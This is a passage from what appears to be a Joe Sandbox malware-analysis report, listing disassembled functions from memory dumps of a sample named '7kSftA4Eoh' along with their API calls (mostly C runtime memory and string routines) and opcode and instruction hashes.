                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Token$CloseHandleInformationOpenProcess
                                                                  • String ID: x86
                                                                  • API String ID: 4232945836-2105985432
                                                                  • Opcode ID: 5a41a51bf698734cf9521a0727e2a643bce50156592c75ad6408320f95609740
                                                                  • Instruction ID: 1a5cd93026961e4c2f986b354ac52fea2b9f85e855f7d43dbd718d407c2ee003
                                                                  • Opcode Fuzzy Hash: 5a41a51bf698734cf9521a0727e2a643bce50156592c75ad6408320f95609740
                                                                  • Instruction Fuzzy Hash: 58E0121571868082DB505B5AF68535AA7A5F7C9BD0F545025EF4947B1ACE2CC894CB40
                                                                  Function 00991CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • calloc.LIBCMT ref: 00991D6A
                                                                    • Part of subcall function 009BAD08: _calloc_impl.LIBCMT ref: 009BAD18
                                                                    • Part of subcall function 009BAD08: _errno.LIBCMT ref: 009BAD2B
                                                                    • Part of subcall function 009BAD08: _errno.LIBCMT ref: 009BAD35
                                                                  • free.LIBCMT ref: 00991EF3
                                                                  • free.LIBCMT ref: 00991EFD
                                                                  • free.LIBCMT ref: 00991F0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_calloc_implcalloc
                                                                  • String ID:
                                                                  • API String ID: 4000150058-0
                                                                  • Opcode ID: 7b8745674e28e7b70cb4deb2e970bc6e60b78951763222cc85c2c654bb8a124c
                                                                  • Instruction ID: 17d260f12eae772917fbfea25c996a890e4a1a68eda95b855020f76a9332bdd7
                                                                  • Opcode Fuzzy Hash: 7b8745674e28e7b70cb4deb2e970bc6e60b78951763222cc85c2c654bb8a124c
                                                                  • Instruction Fuzzy Hash: E0C11E76608B858ADB64CF69E48079E77B8F788B88F10412AEF8D47B58DF38C555CB00
                                                                  Function 0354DD1B Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 0354DDB8
                                                                    • Part of subcall function 0355AA23: _errno.LIBCMT ref: 0355AA5A
                                                                    • Part of subcall function 0355AA23: _invalid_parameter_noinfo.LIBCMT ref: 0355AA65
                                                                  • _snprintf.LIBCMT ref: 0354DDD4
                                                                  • _snprintf.LIBCMT ref: 0354DE4A
                                                                  • _snprintf.LIBCMT ref: 0354DE61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3442832105-0
                                                                  • Opcode ID: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
                                                                  • Instruction ID: 26963b0f69a855957706cb588b5173a8d9fb927f6d95d59e30666bb9b48742c4
                                                                  • Opcode Fuzzy Hash: 0694fbe2251f325486d7db104ce5f9bbd3e0ba48dceb4aa3373eff9f8ea386f1
                                                                  • Instruction Fuzzy Hash: 8361C734618B498FDB45EF58E894BAAB3F5FBD4304F00466AE84AC3261DF34D945CB82
                                                                  Function 03543747 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: af4f2ed209ae52dfb52021ff345b07ebb56da9540d6e1632b77b8fead6dfbfea
                                                                  • Instruction ID: 6ce9466f0741ca27fc1e98490d0e6323319cdf183abcdcd0f50e7bb996463faf
                                                                  • Opcode Fuzzy Hash: af4f2ed209ae52dfb52021ff345b07ebb56da9540d6e1632b77b8fead6dfbfea
                                                                  • Instruction Fuzzy Hash: 9541E634618B064BCB1CDF2CE49557AB3E5FB8831471455ADE89BC7276EE20EC268781
                                                                  Function 009A92AC Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A92E0
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • free.LIBCMT ref: 009A9427
                                                                  • free.LIBCMT ref: 009A948B
                                                                  • free.LIBCMT ref: 009A9497
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$AllocHeap_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 3531731211-0
                                                                  • Opcode ID: bf2fa5ecadbf00b126af2478addb5279d637b8534d83bb3cc027b42e06044e64
                                                                  • Instruction ID: d54715692d23318cb9d8a8227b6df19685ef786b7d620a523b3318257b1e9007
                                                                  • Opcode Fuzzy Hash: bf2fa5ecadbf00b126af2478addb5279d637b8534d83bb3cc027b42e06044e64
                                                                  • Instruction Fuzzy Hash: 0F51103530035596DE28EB2AE45037D73A5FBC6BC4F544826EE0A5BB6ADF7DC9028780
                                                                  Function 00994300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: a9f70d8d661e754e97da783645b1eceb47fb1fb23061e2859f8b3bf798c97032
                                                                  • Instruction ID: a06f2c93efe231682e9ae271d8e4ce76bfa9159d9b4dc3721ed659f9cbc0efd0
                                                                  • Opcode Fuzzy Hash: a9f70d8d661e754e97da783645b1eceb47fb1fb23061e2859f8b3bf798c97032
                                                                  • Instruction Fuzzy Hash: B941B03230478187CF1ADB3AE810B6E77A5F795B88F444925EE2A4BB15EF38D846C700
                                                                  Function 009AACF8 Relevance: 5.1, APIs: 4, Instructions: 54COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 4350b5d869eca4339ae27fc6fc5fc27bb66f5a9d561c1982dceb1c24f79df318
                                                                  • Instruction ID: 5327213162736a4d9dedb061f11b794d1ef06492c22a2065574ccc034b70cede
                                                                  • Opcode Fuzzy Hash: 4350b5d869eca4339ae27fc6fc5fc27bb66f5a9d561c1982dceb1c24f79df318
                                                                  • Instruction Fuzzy Hash: 5121B132704B8082EB59DFA2F5903296765FB89F8DF444626D94F17A7ADF38C480C7A1